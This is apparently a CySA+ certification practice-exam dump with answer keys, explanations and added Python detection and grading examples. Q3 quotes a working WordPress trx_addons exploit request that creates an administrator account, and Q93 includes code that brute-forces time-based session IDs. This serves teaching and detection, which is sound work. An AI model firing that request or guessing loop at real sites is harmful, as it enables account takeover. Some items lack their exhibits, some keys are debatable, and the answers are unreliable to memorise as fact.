A security orchestration, automation, and response (SOAR) system is a solution that combines various
security technologies and workflows to identify security issues, prioritize their severity, and automate a
response. A SOAR system can help an organization consolidate its security tools and processes and
standardize its workflow for incident response. The other options are not relevant or comprehensive for this
purpose. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 15;
https://www.gartner.com/en/informationtechnology/glossary/security-orchestration-automation-and-response-soar

QUESTION 82
A new prototype for a company's flagship product was leaked on the internet. As a result, the management
team has locked out all USB drives. Optical drive writers are not present on company computers. The sales
team has been granted an exception to share sales presentation files with third parties. Which of the
following would allow the IT team to determine which devices are USB enabled?

A. Asset tagging
B. Device encryption
C. Data loss prevention
D. SIEM logs

Correct Answer: D
Explanation

Explanation/Reference:
A security information and event management (SIEM) system is a tool that collects and analyzes log data
from various sources and provides alerts and reports on security incidents and events. A SIEM system can
help the IT team to determine which devices are USB enabled by querying the log data for events related
to USB device insertion, removal, or usage. The other options are not relevant or effective for this purpose.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 15;
https://www.sans.org/reading-room/whitepapers/analyst/securityinformation-event-management-siem-implementation-33969

QUESTION 83
A forensic analyst is conducting an investigation on a compromised server. Which of the following should
the analyst do first to preserve evidence?

A. Restore damaged data from the backup media
B. Create a system timeline
C. Monitor user access to compromised systems
D. Back up all log files and audit trails

Correct Answer: D
Explanation

Explanation/Reference:
The first step to preserve evidence on a compromised server is to back up all log files and audit trails, so
that the analyst holds an unaltered copy of the original records for analysis and verification and neither
the attacker nor routine log rotation can modify or destroy them. Hash the copies and record the hashes in
the chain-of-custody documentation. Restoring data from backup, building a timeline or monitoring user
access come later, and restoring first risks overwriting the evidence. CompTIA Cybersecurity Analyst
(CySA+) Certification Exam Objectives (CS0-002), page 16; https://www.nist.gov/publications/
guide-collection-and-preservation-digital-evidence

QUESTION 84
A cybersecurity analyst is researching operational data to develop a script that will detect the presence of a
threat on corporate assets. Which of the following contains the most useful information to produce this
script?

A. API documentation
B. Protocol analysis captures
C. MITRE ATT&CK reports
D. OpenIoC files

Correct Answer: C
Explanation

Explanation/Reference:
A cybersecurity analyst is researching operational data to develop a script that will detect the presence of a
threat on corporate assets. The most useful information to produce this script is MITRE ATT&CK reports.
MITRE ATT&CK is a knowledge base of adversary tactics and techniques based on real-world
observations. MITRE ATT&CK reports provide detailed information on how different threat actors operate,
what tools they use, what indicators they leave behind, and how to detect or mitigate their attacks. The
other options are not as useful or relevant for this purpose.
Reference: CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9;
https://attack.mitre.org/

QUESTION 85
A security analyst is reviewing the network security monitoring logs listed below:
---------------------------------------------------------------------------
Count: 2 Event#3.3505 2020-01-30 10:40 UTC
GPL WEB SERVER robots.txt access
10.1.1.128 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=45260 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=23415 chksum=0
---------------------------------------------------------------------------
Count: 22 Event#3.3507 2020-01-30 10:40 UTC
ET WEB SPECIFIC APPS PHPStudy Remote Code Execution Backdoor
10.1.1.129 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=65200 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=26814 chksum=0
---------------------------------------------------------------------------
Count: 30 Event#3.3522 2020-01-30 10:40 UTC
ET WEB SERVER WEB-PHP phpinfo access
10.1.1.130 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=58175 -> dport=80
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=22875 chksum=0
---------------------------------------------------------------------------
Count: 22 Event#3.3728 2020-01-30 10:40 UTC
GPL WEB SERVER 403 Forbidden
10.0.0.10 -> 10.1.1.129
IPVer=4 hlen=5 tos=0 dlen=533 ID=0 flags=0 offset=0 ttl=0 chksum=20471
Protocol: 6 sport=80 -> dport=65200
Seq=0 Ack=0 Off=5 Res=0 Flags=******** Win=0 urp=59638 chksum=0
---------------------------------------------------------------------------
Which of the following is the analyst MOST likely observing? (Choose two.)

A. 10.1.1.128 sent potential malicious traffic to the web server.
B. 10.1.1.128 sent malicious requests, and the alert is a false positive.
C. 10.1.1.129 successfully exploited a vulnerability on the web server.
D. 10.1.1.129 sent potential malicious requests to the web server.
E. 10.1.1.129 can determine that port 443 is being used.
F. 10.1.1.130 can potentially obtain information about the PHP version.

Correct Answer: DF
Explanation

Explanation/Reference:
Read each alert together with the server's reply. 10.1.1.129 triggered the ET WEB SPECIFIC APPS
PHPStudy Remote Code Execution Backdoor signature 22 times against 10.0.0.10:80, and the server sent 22
GPL WEB SERVER 403 Forbidden responses back to the same client and source port (65200), so the requests
were rejected: the host sent potentially malicious requests (D), but there is no evidence that the
exploitation succeeded (C). 10.1.1.130 triggered ET WEB SERVER WEB-PHP phpinfo access 30 times;
phpinfo() prints the PHP version, loaded modules and configuration, which an attacker uses to pick an
exploit, so that host can potentially obtain the PHP version (F). The two robots.txt requests from
10.1.1.128 are ordinary crawler behaviour rather than malicious traffic (A, B), and nothing in these
alerts shows whether port 443 is in use (E). CompTIA Cybersecurity Analyst (CySA+) Certification Exam
Objectives (CS0-002), page 8;
https://www.php.net/manual/en/function.phpinfo.php
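The reading above, as an added example that is not from the exam or from any NSM product: a parser for the alert summaries in the layout shown, plus the correlation step that pairs each client's exploit attempts with the server's 403 replies to the same client port. The sample text is constructed to match the four alerts in the question.

```python
import re
from collections import defaultdict

# Constructed sample in the same layout as the alerts in Question 85 (not a real capture).
SAMPLE_ALERTS = """\
---------------------------------------------------------------------------
Count: 2 Event#3.3505 2020-01-30 10:40 UTC
GPL WEB SERVER robots.txt access
10.1.1.128 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=45260 => dport=80
---------------------------------------------------------------------------
Count: 22 Event#3.3507 2020-01-30 10:40 UTC
ET WEB SPECIFIC APPS PHPStudy Remote Code Execution Backdoor
10.1.1.129 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=65200 -> dport=80
---------------------------------------------------------------------------
Count: 30 Event#3.3522 2020-01-30 10:40 UTC
ET WEB SERVER WEB-PHP phpinfo access
10.1.1.130 -> 10.0.0.10
IPVer=4 hlen=5 tos=0 dlen=269 ID=0 flags=0 offset=0 ttl=0 chksum=22704
Protocol: 6 sport=58175 -> dport=80
---------------------------------------------------------------------------
Count: 22 Event#3.3728 2020-01-30 10:40 UTC
GPL WEB SERVER 403 Forbidden
10.0.0.10 -> 10.1.1.129
IPVer=4 hlen=5 tos=0 dlen=533 ID=0 flags=0 offset=0 ttl=0 chksum=20471
Protocol: 6 sport=80 -> dport=65200
---------------------------------------------------------------------------
"""

SEP_RE = re.compile(r"^-{5,}$")
COUNT_RE = re.compile(r"^Count:\s*(\d+)\s+Event#(\S+)\s+(.+)$")
FLOW_RE = re.compile(r"^(\d+(?:\.\d+){3})\s*->\s*(\d+(?:\.\d+){3})$")
PORT_RE = re.compile(r"sport=(\d+)\s*[-=]>\s*dport=(\d+)")   # console uses both '->' and '=>'


def parse_alerts(text):
    """Split the console output into one dict per alert block."""
    alerts, block = [], []
    for line in text.splitlines() + ["-----"]:
        if SEP_RE.match(line.strip()):
            if block:
                alerts.append(_parse_block(block))
                block = []
        elif line.strip():
            block.append(line.strip())
    return alerts


def _parse_block(lines):
    count, event, when = COUNT_RE.match(lines[0]).groups()
    src, dst = FLOW_RE.match(lines[2]).groups()
    ports = next(m for m in map(PORT_RE.search, lines[3:]) if m)
    return {"count": int(count), "event": event, "time": when, "signature": lines[1],
            "src": src, "dst": dst, "sport": int(ports.group(1)), "dport": int(ports.group(2))}


def alerts_per_client(alerts, server_port=80):
    """Total alert count per client IP for traffic towards the web server."""
    totals = defaultdict(int)
    for a in alerts:
        if a["dport"] == server_port:
            totals[a["src"]] += a["count"]
    return dict(totals)


def classify_clients(alerts, server_port=80):
    """Judge each client by its signature and by the server's own reply alerts.
    A 403 sent back to the client's source port means the exploit attempt was rejected."""
    replies = {(a["dst"], a["dport"]): a["signature"] for a in alerts if a["sport"] == server_port}
    verdict = {}
    for a in alerts:
        if a["dport"] != server_port:
            continue
        sig = a["signature"].lower()
        if "backdoor" in sig or "remote code execution" in sig:
            reply = replies.get((a["src"], a["sport"]), "")
            verdict[a["src"]] = ("exploit attempt, rejected (403)" if "403" in reply
                                 else "exploit attempt, outcome unknown")
        elif "phpinfo" in sig:
            verdict[a["src"]] = "information disclosure (PHP version/config)"
        elif "robots.txt" in sig:
            verdict[a["src"]] = "low-risk reconnaissance"
        else:
            verdict[a["src"]] = "unclassified"
    return verdict


if __name__ == "__main__":
    parsed = parse_alerts(SAMPLE_ALERTS)
    print(alerts_per_client(parsed))
    for ip, what in classify_clients(parsed).items():
        print(f"{ip}: {what}")
```

The pairing on (client IP, client source port) is what turns "sent malicious requests" into "sent malicious requests and was refused"; without the server-side alert the outcome would have to be reported as unknown, which is why option C cannot be chosen from these logs alone.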

QUESTION 86
Which of the following lines from this output most likely indicates that attackers could quickly use brute
force and determine the negotiated secret session key?
A. TLS_RSA_WITH_DES_CBC_SHA 56
B. TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 DH (1024 bits)
C. TLS_RSA_WITH_AES_256_CBC_SHA 256
D. TLS_DHE_RSA_WITH_AES_256_GCM_SHA256 DH (2048 bits)

Correct Answer: B
Explanation

Explanation/Reference:
The line is TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 DH (1024 bits). The cipher suite uses ephemeral
Diffie-Hellman (DHE) key exchange authenticated with RSA, AES-128 in cipher block chaining (CBC) mode,
and SHA-1 for the MAC. What singles this line out is the DH (1024 bits) annotation, not the AES key: the
Diffie-Hellman group in which the session key is negotiated is only 1024 bits, below the 2048-bit minimum
now expected, and the Logjam research showed that an attacker who invests in a one-time precomputation
against a 1024-bit group can afterwards recover individual session keys quickly. Note that
TLS_RSA_WITH_DES_CBC_SHA 56 is also broken, since a 56-bit DES key can be brute-forced directly, so in
practice both A and B must be disabled; the answer key focuses on the weak DH group.
TLS_RSA_WITH_AES_256_CBC_SHA 256 has a strong symmetric key (though static RSA key exchange provides no
forward secrecy), and TLS_DHE_RSA_WITH_AES_256_GCM_SHA256 DH (2048 bits) is the strongest of the four.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 9; https://
learn.microsoft.com/en-us/windows/win32/secauthn/cipher-suites-in-schannel
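A grader for lines in the format of the four options, added here as an example and not taken from the exam or any scanner. It assumes the one-suite-per-line layout shown (suite name, optional key size, optional DH/ECDH group size) and applies the two thresholds that decide whether a session key is recoverable: a symmetric key below 112 bits and a finite-field DH group below 2048 bits. It flags both A and B, which is the caveat noted above.

```python
import re

# Added grader; assumes the "TLS_... <bits> [DH|ECDH (<n> bits)]" layout of the options.
SUITE_RE = re.compile(
    r"^(?P<name>TLS_[A-Z0-9_]+)"
    r"(?:\s+(?P<bits>\d+))?"
    r"(?:\s+(?P<kx>DH|ECDH)\s+\((?P<group>\d+)\s+bits\))?\s*$"
)
MIN_SYMMETRIC_BITS = 112    # NIST SP 800-57 floor; DES (56) and export suites fall below it
MIN_DH_GROUP_BITS = 2048    # 1024-bit finite-field groups are within reach of precomputation (Logjam)
STATIC_KEX = {"RSA", "DH_RSA", "DH_DSS"}   # key exchange without forward secrecy


def _key_bits_from_name(cipher):
    """Key size implied by the cipher name when the scanner did not print one."""
    m = re.search(r"_(\d{2,3})_", cipher + "_")          # AES_256_GCM -> 256
    if m:
        return int(m.group(1))
    return {"DES_CBC": 56, "3DES_EDE_CBC": 112, "RC4_128": 128}.get(cipher, 0)


def parse_suite(line):
    m = SUITE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised cipher-suite line: {line!r}")
    name = m.group("name")
    kex, _, rest = name[len("TLS_"):].partition("_WITH_")   # "DHE_RSA", "AES_128_CBC_SHA"
    cipher, _, mac = rest.rpartition("_")                    # "AES_128_CBC", "SHA"
    return {"name": name, "kex": kex, "cipher": cipher, "mac": mac,
            "bits": int(m.group("bits")) if m.group("bits") else _key_bits_from_name(cipher),
            "group_bits": int(m.group("group")) if m.group("group") else None}


def grade_suite(line):
    """'weak' = an attacker can recover the negotiated session key; 'advisory' = keep an eye on it."""
    s = parse_suite(line)
    findings = []
    if s["bits"] < MIN_SYMMETRIC_BITS:
        findings.append(("weak", f"{s['bits']}-bit symmetric key can be brute-forced directly"))
    if s["cipher"].startswith(("DES_", "RC4_", "NULL")) or "EXPORT" in s["name"]:
        findings.append(("weak", f"{s['cipher']} is a deprecated cipher"))
    if s["group_bits"] is not None and s["group_bits"] < MIN_DH_GROUP_BITS:
        findings.append(("weak", f"{s['group_bits']}-bit DH group: session key recoverable after precomputation (Logjam)"))
    if s["kex"] in STATIC_KEX:
        findings.append(("advisory", "static key exchange: no forward secrecy"))
    if s["cipher"].endswith("_CBC"):
        findings.append(("advisory", "CBC mode: prefer an AEAD suite (GCM/CHACHA20)"))
    severity = "weak" if any(lvl == "weak" for lvl, _ in findings) else ("advisory" if findings else "ok")
    return {"suite": s["name"], "bits": s["bits"], "severity": severity,
            "findings": [msg for _, msg in findings]}


def session_key_at_risk(lines):
    """Names of the suites whose negotiated session key an attacker could recover."""
    return [g["suite"] for g in map(grade_suite, lines) if g["severity"] == "weak"]


# The four lines from Question 86.
OPTIONS = [
    "TLS_RSA_WITH_DES_CBC_SHA 56",
    "TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 DH (1024 bits)",
    "TLS_RSA_WITH_AES_256_CBC_SHA 256",
    "TLS_DHE_RSA_WITH_AES_256_GCM_SHA256 DH (2048 bits)",
]

if __name__ == "__main__":
    for line in OPTIONS:
        g = grade_suite(line)
        print(f"{g['severity']:8} {g['suite']}  {'; '.join(g['findings']) or 'no findings'}")
```

The two "weak" reasons are different attacks: against A the attacker searches the 56-bit DES key space for each session, against B a single precomputation on the shared 1024-bit group amortises across every session that uses it. Both end with the session key in the attacker's hands, which is why the fix is to remove both suites rather than to choose between them.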

QUESTION 87
A risk assessment concludes that the perimeter network has the highest potential for compromise by an
attacker, and it is labeled as a critical risk environment. Which of the following is a valid compensating
control to reduce the volume of valuable information in the perimeter network that an attacker could gain
using active reconnaissance techniques?

A. A control that demonstrates that all systems authenticate using the approved authentication method
B. A control that demonstrates that access to a system is only allowed by using SSH
C. A control that demonstrates that firewall rules are peer reviewed for accuracy and approved before
deployment
D. A control that demonstrates that the network security policy is reviewed and updated yearly

Correct Answer: C
Explanation

Explanation/Reference:
A valid compensating control to reduce the volume of valuable information in the perimeter network that an
attacker could gain using active reconnaissance techniques is a control that demonstrates that firewall
rules are peer reviewed for accuracy and approved before deployment. This control can help ensure that
the firewall rules are configured correctly and securely, and that they do not allow unnecessary or
unauthorized access to the perimeter network. The other options are not compensating controls or do not
address the risk of active reconnaissance. CompTIA Cybersecurity Analyst (CySA+) Certification Exam
Objectives (CS0-002), page 14; https://www.isaca.org/resources/isaca-journal/issues6/volume-3/
compensating-controls

QUESTION 88
An analyst received an alert regarding an application spawning a suspicious command shell process Upon
further investigation, the analyst observes the following registry change occurring immediately after the
suspicious event:

Which of the following was the suspicious event able to accomplish?

A. Impair defenses.
B. Establish persistence.
C. Bypass file access controls.
D. Implement beaconing.

Correct Answer: A
Explanation

QUESTION 89
A technician working at company.com received the following email:
After looking at the above communication, which of the following should the technician recommend to the
security team to prevent exposure of sensitive information and reduce the risk of corporate data being
stored on non-corporate assets?

A. Forwarding of corporate email should be disallowed by the company.
B. A VPN should be used to allow technicians to troubleshoot computer issues securely.
C. An email banner should be implemented to identify emails coming from external sources.
D. A rule should be placed on the DLP to flag employee IDs and serial numbers.

Correct Answer: C
Explanation

Explanation/Reference:
An email banner is a message that is added to the top or bottom of an email to provide some information
or warning to the recipient. An email banner should be implemented to identify emails coming from external
sources to prevent exposure of sensitive information and reduce the risk of corporate data being stored on
non-corporate assets. An email banner can help employees recognize phishing or spoofing attempts and
avoid clicking on malicious links or attachments. It can also remind employees not to share confidential
information with external parties or forward corporate emails to personal accounts. The other options are
not relevant or effective for this purpose. Reference: CompTIA Cybersecurity Analyst (CySA+) Certification
Exam Objectives (CS0-002), page 13; https://www.csoonline.com/article5970/what-is-spoofing-definition-
and-how-to-preventit.html

QUESTION 90
A company is aiming to test a new incident response plan. The management team has made it clear that
the initial test should have no impact on the environment. The company has limited resources to support
testing. Which of the following exercises would be the best approach?

A. Tabletop scenarios
B. Capture the flag
C. Red team vs. blue team
D. Unknown-environment penetration test

Correct Answer: A
Explanation

Explanation/Reference:
A tabletop scenario is an informal, discussion-based session in which a team discusses their roles and
responses during an emergency, walking through one or more example scenarios. A tabletop scenario is
the best approach for a company that wants to test a new incident response plan without impacting the
environment or using many resources. A tabletop scenario can help the company identify strengths and
weaknesses in their plan, clarify roles and responsibilities, and improve communication and coordination
among team members. The other options are more intensive and disruptive exercises that involve
simulating a real incident or attack. CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives
(CS0-002), page 16; https://www.linkedin.com/pulse/tabletop-exercises-explained-matt-lemon-phd

QUESTION 91
Which of the following is the best reason why organizations need operational security controls?

A. To supplement areas that other controls cannot address
B. To limit physical access to areas that contain sensitive data
C. To assess compliance automatically against a secure baseline
D. To prevent disclosure by potential insider threats

Correct Answer: A
Explanation

Explanation/Reference:
Operational security controls are security measures that are implemented and executed by people rather
than by systems. Operational security controls are needed to supplement areas that other controls, such
as technical or physical controls, cannot address. For example, operational security controls can include
policies, procedures, training, awareness, audits, reviews, testing, etc. These controls can help ensure that
employees follow best practices, comply with regulations, detect and report incidents, and respond to
emergencies. The other options are not specific to operational security controls or are too narrow in scope.
CompTIA Cybersecurity Analyst (CySA+) Certification Exam Objectives (CS0-002), page 14; https://
www.isaca.org/resources/isacajournal/issues6/volume-3/operational-security-controls

QUESTION 92
An organization has the following risk mitigation policies:

Risks without compensating controls will be mitigated first if the risk value is greater than $50,000.
Other risk mitigation will be prioritized based on risk value.

The following risks have been identified:

Which of the following is the order of priority for risk mitigation from highest to lowest?

A. A, C, D, B
B. B, C, D, A
C. C, B, A, D
D. C, D, A, B
E. D, C, B, A

Correct Answer: C
Explanation

Explanation/Reference:
The order of priority for risk mitigation from highest to lowest is C, B, A, D. Apply the two policies in turn.
The first policy has two conditions, and both must hold: the risk has no compensating control and its risk
value exceeds $50,000. Risks C and B have no compensating controls and, for the answer key to be right,
both must clear the threshold, so they are mitigated first, highest value first (C, at $75,000, ahead of B).
Note that the $40,000 figure quoted for B in the original explanation would fail the threshold and, by value,
drop B to last place, so check the table's figures against both conditions rather than only the "no
compensating control" column. The second policy then orders the remaining risks by risk value: A ($60,000,
compensating control: encryption) before D ($50,000, compensating control: backup power supply). The risk
table itself is not reproduced on this page.
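The two-rule policy as code, added here as an example rather than anything from the exam. The dollar figures are constructed, not the exam's table (which is not on this page); the second call shows the edge case discussed above, where a risk with no compensating control but a value at or below the threshold falls through to the second rule.

```python
FIRST_RULE_THRESHOLD = 50_000   # from the policy: "greater than $50,000"


def prioritize(risks, threshold=FIRST_RULE_THRESHOLD):
    """Order risk names for mitigation, highest priority first.
    Rule 1: no compensating control AND value > threshold, highest value first.
    Rule 2: every remaining risk, highest value first."""
    uncovered, remaining = [], []
    for r in risks:
        qualifies = r["compensating_control"] is None and r["value"] > threshold
        (uncovered if qualifies else remaining).append(r)
    by_value = lambda r: -r["value"]
    return ([r["name"] for r in sorted(uncovered, key=by_value)]
            + [r["name"] for r in sorted(remaining, key=by_value)])


# Constructed figures (not the exam's table); compensating controls as the explanation lists them.
RISKS = [
    {"name": "A", "value": 60_000, "compensating_control": "encryption"},
    {"name": "B", "value": 55_000, "compensating_control": None},
    {"name": "C", "value": 75_000, "compensating_control": None},
    {"name": "D", "value": 50_000, "compensating_control": "backup power supply"},
]


def with_value(risks, name, value):
    """Copy of the risk list with one risk's value changed (for what-if checks)."""
    return [dict(r, value=value) if r["name"] == name else r for r in risks]


if __name__ == "__main__":
    print("as tabulated:     ", prioritize(RISKS))                        # C, B, A, D
    print("B at $40,000:     ", prioritize(with_value(RISKS, "B", 40_000)))  # C, A, D, B
```

Keeping the threshold and the "greater than" comparison explicit matters: D sits exactly at $50,000, and a policy worded "greater than" excludes it from the first rule even if its compensating control were removed.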

QUESTION 93
A code review reveals a web application is using time-based cookies for session management. This is a
security concern because time-based cookies are easy to:

A. parameterize.
B. decode.
C. guess.
D. decrypt.

Correct Answer: C
Explanation

Explanation/Reference:
A time-based session cookie carries a session identifier derived from the time at which the session was
created (or from a counter that advances predictably with time). Because the input space is tiny and an
attacker can often tell roughly when a victim logged in, the attacker can enumerate the candidate
timestamps, regenerate the token for each one and present it until the application accepts it: the token is
easy to guess. Encoding, hashing or encrypting the timestamp does not help, since the underlying value
remains predictable. Session identifiers must be unpredictable values from a cryptographically secure
random number generator (OWASP's session management guidance asks for at least 64 bits of entropy and
a 128-bit identifier), issued server-side and regenerated on login. ("Lime-based" in the original text is a
scan error for "time-based".) Reference:
https://www.techopedia.com/definition/1529/session-cookie
https://cheatsheetseries.owasp.org/cheatsheets/Session_Management_Cheat_Sheet.html
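The weakness worked through, as an added illustration that is not from the exam or from any real application: a toy session-ID generator derived from the login time, the attacker's enumeration of the surrounding window, and the CSPRNG-backed replacement. The attacker model assumed here is that the attacker knows the victim's login time to within a few minutes.

```python
import hashlib
import secrets


def time_based_session_id(start_ts):
    """Vulnerable: the token is a function of the session start time alone (integer seconds).
    Hashing the timestamp hides nothing; the size of the input space is what matters."""
    return hashlib.sha256(str(int(start_ts)).encode()).hexdigest()


def random_session_id(nbytes=32):
    """Hardened: 256 bits from the OS CSPRNG, which is what session-management guidance expects."""
    return secrets.token_urlsafe(nbytes)


def guess_time_based_session(target_token, approx_ts, window_seconds=300):
    """Attacker model (assumed): knows roughly when the victim logged in, e.g. from a
    'last seen' timestamp or by watching them. Enumerate the window, regenerate each
    candidate token and compare. Returns (recovered_timestamp, attempts) or (None, attempts)."""
    base = int(approx_ts)
    attempts = 0
    for offset in range(-window_seconds, window_seconds + 1):
        attempts += 1
        candidate = base + offset
        if secrets.compare_digest(time_based_session_id(candidate), target_token):
            return candidate, attempts
    return None, attempts


def search_space(window_seconds=300):
    """Candidates to try: 2*window+1 for a time-based token versus 2**256 for a random one."""
    return 2 * window_seconds + 1, 2 ** 256


if __name__ == "__main__":
    victim_login = 1_700_000_000          # constructed: the victim logged in at this Unix time
    token = time_based_session_id(victim_login + 137)
    print("time-based token recovered at", guess_time_based_session(token, victim_login))
    print("random token recovered at    ", guess_time_based_session(random_session_id(), victim_login))
    print("search space (time vs random):", search_space())
```

Against a live application each candidate costs one HTTP request, so a few hundred attempts are trivial; the same loop against the random identifier has no usable window to enumerate.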

QUESTION 94
Which of the following activities is designed to handle a control failure that leads to a breach?

A. Risk assessment
B. Incident management
C. Root cause analysis
D. Vulnerability management

Correct Answer: B
Explanation

Explanation/Reference:
Incident management is a process that aims to handle a control failure that leads to a breach by restoring
normal operations as quickly as possible and minimizing the impact and damage of the incident. Incident
management involves activities such as identifying, analyzing, containing, eradicating, recovering, and
learning from security incidents. Risk assessment, root cause analysis, and vulnerability management are
other processes related to security management, but they are not designed to handle a control failure that
leads to a breach.

Reference: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901

Exam C

QUESTION 1
A security team conducts a lessons-learned meeting after struggling to determine who should conduct the
next steps following a security event. Which of the following should the team create to address this issue?

A. Service-level agreement
B. Change management plan
C. Incident response plan
D. Memorandum of understanding

Correct Answer: C
Explanation

Explanation/Reference:
An incident response plan outlines the procedures, roles, and responsibilities for responding to security
incidents within an organization. It provides clear guidance on how to handle different types of incidents,
including who is responsible for what actions during and after an incident.

QUESTION 2
A cybersecurity analyst notices unusual network scanning activity coming from a country that the company
does not do business with. Which of the following is the best mitigation technique?

A. Geoblock the offending source country.
B. Block the IP range of the scans at the network firewall.
C. Perform a historical trend analysis and look for similar scanning activity.
D. Block the specific IP address of the scans at the network firewall.

Correct Answer: B
Explanation

Explanation/Reference:
Blocking the scanning source's IP range at the network firewall stops the activity without the collateral
damage of a country-wide geoblock. A geoblock also cuts off legitimate users located in that country (think
of the CEO on vacation there, unable to reach the office or the website) and keys on a coarse attribute that
an attacker can sidestep by scanning from elsewhere. Blocking only the single address is too narrow, since
scanners rotate addresses within a range, and a historical trend analysis on its own mitigates nothing.

QUESTION 3
An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to
be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit
contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A. Limit user creation to administrators only.
B. Limit layout creation to administrators only.
C. Set the directory trx_addons to read only for all users.
D. Set the directory V2 to read only for all users.

Correct Answer: A
Explanation

Explanation/Reference:
The snippet is a crafted request to the /wp-json/trx_addons/V2/get/sc_layout REST endpoint of a WordPress
plugin: the sc parameter names the callback to run (wp_insert_user) and role=administrator asks it to create
an administrator account. The control that defeats the attack is an authorization check on user creation, so
that only administrators can create accounts (A). Read-only permissions on the trx_addons or V2 directories
(C, D) do not change what the REST route does when it is called, and layout creation (B) is not what the
attacker is after.
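Detection for the request pattern quoted above, added here as an example and not part of the exam or of the plugin: a rule that parses web-server access logs (Apache combined format), matches the endpoint, percent-decodes the query string so that an encoded role name does not slip past, and rates the hit. The log lines are constructed; the addresses are documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Endpoint and parameter names come from the snippet in Question 3.
SUSPICIOUS_ENDPOINT = re.compile(r"/wp-json/trx_addons/v2/get/sc_layout", re.IGNORECASE)
PRIVILEGED_ROLES = {"administrator", "editor"}
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)


def inspect_request(line):
    """Return a finding for a request that hits the shortcode-layout endpoint, else None."""
    m = ACCESS_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("target"))
    if not SUSPICIOUS_ENDPOINT.search(url.path):
        return None
    # parse_qs percent-decodes, so role=%61dministrator is seen as "administrator"
    params = {k.lower(): v[0].lower() for k, v in parse_qs(url.query).items()}
    finding = {"ip": m.group("ip"), "time": m.group("ts"), "status": int(m.group("status")),
               "sc": params.get("sc", ""), "role": params.get("role", "")}
    if finding["sc"] == "wp_insert_user" and finding["role"] in PRIVILEGED_ROLES:
        finding["severity"] = "high"     # attempt to create a privileged user
    else:
        finding["severity"] = "medium"   # endpoint touched; review which callback was requested
    return finding


def scan(lines):
    return [f for f in map(inspect_request, lines) if f]


# Constructed access-log lines (Apache combined format), not real traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator HTTP/1.1" 200 512 "-" "python-requests/2.31"',
    '198.51.100.9 - - [10/Oct/2023:13:56:01 +0000] "GET /wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=%61dministrator HTTP/1.1" 403 199 "-" "curl/8.0"',
    '192.0.2.44 - - [10/Oct/2023:13:57:12 +0000] "GET /wp-json/wp/v2/posts?per_page=5 HTTP/1.1" 200 8012 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['severity']:6} {f['ip']} status={f['status']} sc={f['sc']} role={f['role']}")
```

A 200 on the first line only says the endpoint served the request; whether an account was actually created has to be confirmed in the application's user table. On the server side the fix that option A describes is an authorization check inside the callback before any user is inserted (in WordPress terms, a capability check such as current_user_can('create_users')).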

QUESTION 4
A penetration tester submitted data to a form in a web application, which enabled the penetration tester to
retrieve user credentials. Which of the following should be recommended for remediation of this application
vulnerability?

A. Implementing multifactor authentication on the server OS
B. Hashing user passwords on the web application
C. Performing input validation before allowing submission
D. Segmenting the network between the users and the web server

Correct Answer: C
Explanation

Explanation/Reference:
Input validation is a critical security measure to prevent various types of web application attacks, including
SQL injection, cross-site scripting (XSS), and data manipulation. It helps ensure that user inputs are
sanitized and do not contain malicious or unexpected data.

QUESTION 5
A cybersecurity team lead is developing metrics to present in the weekly executive briefs. Executives are
interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the
following metrics should the team lead include in the briefs?

A. Mean time between failures
B. Mean time to detect
C. Mean time to remediate
D. Mean time to contain

Correct Answer: D
Explanation

Explanation/Reference:
Mean time to contain is the metric that the cybersecurity team lead should include in the weekly executive
briefs, as it measures how long it takes to stop the spread of malware that enters the network. Mean time
to contain is the average time it takes to isolate and neutralize an incident or a threat, such as malware,
from the time it is detected. Mean time to contain is an important metric for evaluating the effectiveness
and efficiency of the incident response process, as well as the potential impact and damage of the incident
or threat. A lower mean time to contain indicates a faster and more successful response, which can reduce
the risk and cost of the incident or threat. Mean time to contain can also be compared with other metrics,
such as mean time to detect or mean time to remediate, to identify gaps or areas for improvement in the
incident response process.

QUESTION 6
An employee accessed a website that caused a device to become infected with invasive malware. The
incident response analyst has:

1. created the initial evidence log.
2. disabled the wireless adapter on the device.
3. interviewed the employee, who was unable to identify the website that was accessed.
4. reviewed the web proxy traffic logs.

Which of the following should the analyst do to remediate the infected device?

A. Update the system firmware and reimage the hardware.
